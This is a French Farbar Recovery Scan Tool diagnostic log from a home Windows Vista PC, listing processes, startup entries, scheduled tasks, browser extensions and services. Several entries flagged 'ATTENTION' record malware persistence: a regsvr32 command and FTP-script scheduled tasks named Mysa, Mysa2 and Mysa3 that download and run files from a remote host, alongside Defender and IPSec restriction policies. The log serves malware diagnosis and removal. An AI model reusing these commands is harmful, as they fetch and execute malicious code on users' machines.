cjoint


Document format: text/plain


Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x86) Version: 16-05-2019
Exécuté par françoise (administrateur) sur PC-DE-FRANÇOISE (Packard Bell BV IMEDIA A4730 FR) (17-05-2019 15:29:21)
Exécuté depuis C:\Users\françoise\Desktop
Profils chargés: françoise (Profils disponibles: françoise)
Platform: Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2 (X86) Langue: Français (France)
Internet Explorer Version 9 (Navigateur par défaut: "C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe" -- "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

() [Fichier non signé] C:\Program Files\PACKARD BELL\Packard Bell Recovery Management\Service\ETService.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe
(DEVGURU CO LTD -> DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe
(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe
(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportService.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\conime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(TeamViewer -> TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe

==================== Registre (Avec liste blanche) ===========================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [242392 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [SSBkgdUpdate] => C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [210472 2006-10-25] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [OpwareSE4] => C:\Program Files\ScanSoft\OmniPageSE4\OpwareSE4.exe [79400 2007-02-04] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [644696 2007-05-14] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1603152 2007-04-03] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [Google Update] => C:\Users\françoise\AppData\Local\Google\Update\1.3.34.11\GoogleUpdateCore.exe [410920 2019-05-15] (Google Inc -> Google LLC)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [orangeinside] => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [AvastBrowserAutoLaunch_F5C52D2961A6248B8567D8EC64132959] => C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe [1027624 2018-06-13] (AVAST Software s.r.o. -> AVAST Software)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [uTorrent] => C:\Users\françoise\AppData\Roaming\uTorrent\uTorrent.exe [1996008 2019-05-10] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [879616 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-18\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKLM\...\Drivers32: [VIDC.I420] => C:\Windows\system32\lvcodec2.dll [204800 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
HKLM\...\Drivers32: [MSVideo] => C:\Windows\system32\vfwwdm32.dll [56832 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files\AVAST Software\Browser\Application\49.0.79.76\Installer\chrmstp.exe [2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files\Google\Chrome\Application\49.0.2623.112\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
IFEO\malivebox.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\softwareupdate.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\uninstall.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast Cleanup Premium.lnk [2019-05-13]
ShortcutTarget: Avast Cleanup Premium.lnk -> C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Startup: C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Startup\Canon IJ Status Monitor Canon MP240 series Printer.lnk [2019-05-16]
ShortcutAndArgument: Canon IJ Status Monitor Canon MP240 series Printer.lnk -> C:\Windows\system32\rundll32.exe => C:\Users\FRANOI~1\CNMSSC~2.DLL,SMStarterEntryPoint LPT1:;Canon MP240 series Printer;cnmss Canon MP240 series Printer (Local).dll;Canon IJ Status Monitor Canon MP240 series Printer.lnk
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {0B986567-D5A0-466D-90CE-C6EA17AF48CB} - System32\Tasks\{2ACEEE12-CA2E-4ED0-9ED9-F350864625FF} => C:\Windows\system32\pcalua.exe -a C:\Users\françoise\Music\emule_emule_0.50a_francais_10876.exe -d C:\Users\françoise\Music
Task: {23A05E22-719B-4639-8ED4-E50D1BF847F6} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {272B0EB1-5B65-4E2B-B920-5CD7BDE8AB1D} - System32\Tasks\DriverMaxAgent => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {277A1958-55E6-4D01-9881-DCB9E67CC30A} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {2F2E331F-0C3D-474F-8FFC-68325E35CD6D} - System32\Tasks\Avast Driver Updater Startup => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe [30443544 2018-07-18] (Avast Software s.r.o. -> AVAST Software)
Task: {3222E643-169C-40EE-9A60-C34E4CD7F4E8} - System32\Tasks\DriverMaxWelcome => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {346BEEC7-9FDD-454A-AFC5-D12954CCE041} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2762968 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
Task: {39BC81B2-D425-470C-830B-A2A3E0C91385} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3E04B49A-6384-4D28-B49D-43D32A70311F} - System32\Tasks\Microsoft\Windows\orangeinside => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
Task: {5CE15FEB-54CD-4D3C-AE35-DE660545EEAA} - System32\Tasks\SafeZone scheduled Autoupdate 1458889759 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {5E251469-0255-4DFC-A6DD-4636B300949C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
Task: {67D47C43-8EE6-48D8-B3B2-A2C82F6FB4AF} - System32\Tasks\Microsoft\Windows\orangeinstaller => C:\Program Files\Orange\Orange Installer\OrangeInstaller.exe [476760 2015-01-19] (Orange -> ) [Fichier non signé]
Task: {6BDADB0C-EA57-4C4F-B5EA-7E5102862C78} - System32\Tasks\NCH Software\ExpressZipSevenDays => C:\Program Files\NCH Software\ExpressZip\ExpressZip.exe
Task: {7D9D1F80-7C72-4799-A02F-0A9ED17916F4} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\system32\Macromed\Flash\FlashUtil32_32_0_0_192_pepper.exe [1452600 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {873A6B77-CFA4-4905-B5CF-76A82D9C68BC} - \{817E9192-15EC-4FFE-A72F-DABBFC15959C} -> Pas de fichier <==== ATTENTION
Task: {8FDBF865-E536-48B6-AA6C-DC481CB90BDA} - System32\Tasks\DriverMax Notification => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {97109F3F-5BA3-4BAD-82AE-2DB1B731736B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {9780B131-4D91-4780-954E-F2E4E95D39C6} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {983A22A5-92DC-4D9A-9153-0968803E05FD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000UA => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {A375B2A1-7F8C-414C-A964-DCEAF1E4836A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {A478E9B7-5E38-4215-9236-BE479ADFCFB2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [563000 2015-08-27] (Apple Inc. -> Apple Inc.)
Task: {A55847CA-AE49-4725-973E-FEDC55FDB08F} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {A7F6ADB5-BB0C-4F4C-BBAA-94D94C56BA34} - \{64DCAE36-32A2-4828-8C48-07BD5794F957} -> Pas de fichier <==== ATTENTION
Task: {ADA0EF61-0724-4B9D-82E8-6609DDF5823F} - System32\Tasks\Avast Cleanup Update => C:\Program Files\AVAST Software\Avast Cleanup\TUNEUpdate.exe [1659000 2019-05-13] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Task: {C20ECECA-8FFD-40B2-B461-D3A11445234E} - System32\Tasks\avastBCLRestartS-1-5-21-451813890-3602019613-3621138349-1000 => C:\Program Files\Mozilla Firefox\firefox.exe
Task: {C31A9A93-E78F-4F43-BB24-82C25C1EF5B5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {D0A78623-4791-415C-81EB-148368A041D4} - System32\Tasks\Application Starter - 8882161c434ab0fd43dca37f474f4351 => C:\Program Files\Innovative Solutions\DriverMax\innostp.exe
Task: {D16F6C4B-6464-4B3E-9FB5-03F581FB2830} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {D30B5003-7484-40B4-B904-E847C84CC77E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000Core => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {EEB404EA-E9DE-4236-806D-30C4A1CD81FA} - System32\Tasks\{DBF0312E-896C-4AA5-82F7-0E48DBF36528} => C:\Windows\system32\pcalua.exe -a K:\InstallTomTomHOME.exe -d K:\
Task: {F5B03916-A23B-4EE0-916C-95E8D4B6B617} - System32\Tasks\maLivebox => C:\Program Files\Orange\ma Livebox\maLivebox.exe [146704 2017-02-07] (Orange -> Orange) [Fichier non signé]
Task: {FB629BE2-5125-4659-B018-D929EB96107E} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\Windows\Tasks\Avast Driver Updater Startup.job => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{86398058-6e11-4b3f-8997-c7140cc09ad5} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1BD299F8-4997-4407-95AD-7E5F67B163F7}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{76E74176-2E6B-4D36-B45C-00E50F93D500}: [DhcpNameServer] 192.168.1.1
HKLM\System\...\Parameters\PersistentRoutes: [0.0.0.0,0.0.0.0,192.168.1.1,1]

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_IEe32_wvistae32_odc
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-451813890-3602019613-3621138349-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll [2007-06-08] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default [2018-12-23]
FF NetworkProxy: TomTom\HOME\Profiles\n1j5dpk5.default -> type", 4
FF Extension: (Emulator) - C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default\Extensions\Navcore.9.510.1234792@tomtom.com [2017-12-10] [Legacy] [non signé]
FF ProfilePath: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 [2019-05-17]
FF Homepage: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_FFe32_wvistae32_odc
FF NewTab: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxp://www.bing.com/?pc=COS2&ptag=D050219-A9FCDBB39EF&form=CONMHP&conlogo=CT3335799
FF Extension: (IBM Security Rapport) - C:\Users\françoise\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2018-03-27] [UpdateUrl:hxxps://clients2.google.com/service/update2/crx]
FF Extension: (To Google Translate) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\jid1-93WyvpgvxzGATw@jetpack.xpi [2019-04-04]
FF Extension: (Avast Online Security) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\wrc@avast.com.xpi [2019-04-30]
FF SearchPlugin: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\searchplugins\bing-lavasoft-ff59.xml [2019-05-02]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-01-27] [Legacy] [non signé]
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [Fichier non signé]
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2014-08-13] (Google Inc -> Google, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [Pas de fichier]
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @videolan.org/vlc,version=2.1.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\françoise\AppData\Local\Google\Chrome\User Data\Default [2019-05-04]
CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx
CHR HKLM\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-451813890-3602019613-3621138349-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 AdobeFlashPlayerUpdateSvc; C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6799632 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 Ati External Event Utility; C:\Windows\system32\Ati2evxx.exe [655360 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S2 avast; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [324000 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [338632 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
S3 avastm; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 CleanupPSvc; C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe [10227280 2019-04-16] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
S4 Dedicarz Service; C:\Program Files\Orange\ma Livebox\dedicarz\DedicarzService.exe [1970544 2014-09-15] (FRANCE TELECOM -> ) [Fichier non signé]
R2 ETService; C:\Program Files\Packard Bell\Packard Bell Recovery Management\Service\ETService.exe [24576 2008-07-16] () [Fichier non signé]
R2 ezSharedSvc; C:\Windows\System32\ezsvc7.dll [129992 2008-02-03] (EasyBits Software AS -> EasyBits Sofware AS) [Fichier non signé]
S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2008-12-16] (Macrovision Europe Ltd.) [Fichier non signé]
S4 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [101528 2007-04-13] (Canon Inc. -> ) [Fichier non signé]
S2 Orange update Core Service; C:\Program Files\Orange\OrangeUpdate\Service\OUCore.exe [1082016 2012-10-05] (FRANCE TELECOM -> France Telecom SA)
R2 RapportMgmtService; C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe [5243208 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S4 SkypeUpdate; C:\Program Files\Skype\Updater\Updater.exe [317400 2017-04-05] (Skype Software Sarl -> Skype Technologies) [Fichier non signé]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2015-05-21] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
